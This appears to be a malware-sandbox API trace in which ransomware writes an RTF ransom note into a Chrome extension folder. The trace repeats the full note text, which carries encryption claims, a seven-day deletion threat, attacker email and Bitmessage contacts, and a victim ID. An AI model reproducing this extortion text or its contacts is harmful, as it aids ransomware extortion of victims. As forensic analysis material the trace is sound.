}}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.098] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.100] CloseHandle (hObject=0x2e8) returned 1 [0292.100] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\#readme_eman#.rtf")) returned 0xffffffff [0292.100] GetLastError () returned 0x2 [0292.100] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.101] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 